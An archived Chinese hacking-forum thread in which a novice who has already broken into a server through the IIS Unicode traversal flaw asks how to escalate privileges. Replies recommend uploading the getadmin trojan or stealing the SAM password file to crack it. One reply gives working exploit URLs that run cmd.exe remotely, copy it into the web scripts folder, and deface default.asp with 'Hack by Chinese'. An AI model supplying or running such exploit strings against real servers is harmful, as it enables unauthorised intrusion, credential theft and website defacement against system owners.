这是在 20CN网络安全小组第一代论坛 的论坛 菜鸟乐园 中的主题 谁有办法?


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=1;t=000516
老老菜鸟 发表于 :
 
利用unicodi漏洞入侵后能用telnet连接,可没有net user的权限,各位老鸟有没有办法提升权限。(自然越简单越好了,呵呵)
 
TomyChen 发表于 :
 
unicode是guest用户权,当然不能用net user
上传getadmin之类木马或者下载sam破解。

------------------
人生就像一个方程:
一是有解;
一是无解;
我就是属于无解的。
 

老老菜鸟 发表于 :
 
getadmin木马成功率并不高啊

下载sam破解,太费时。有没有更好一点的东东或是更好的方法?
 

老老菜鸟 发表于 :
 
各位在有谁在帮我一下?
 
周秋阳 发表于 :
 
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c +copy%20c:\autoexec.bat+c:\autoexec.bak http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak

c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe拷贝,cmd.exe(必须改名)方法: http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
通过http://ip/scripts/ccc.exe?/c+dir+c:\ 可以看到c:\文件。
我们就可以调用到cmd.exe了,就是说不用那个编码了。 +c:\inetpub\wwwroot\default.asp target=_blank>http://ip/scripts/ccc.exe?/c+echo+Hack+by+Chinese+>+c:\inetpub\wwwroot\default.asp http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>>+c:\inetpub\wwwroot\default.asp

………………

------------------
每个人都有无法忘记的人,思念会像细沙穿过你的灵魂,轻轻开了门,只有风雨声。
 

周秋阳 发表于 :
 
您可以试试看,我自己感觉不怎么行了!

------------------
每个人都有无法忘记的人,思念会像细沙穿过你的灵魂,轻轻开了门,只有风雨声。
 





Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。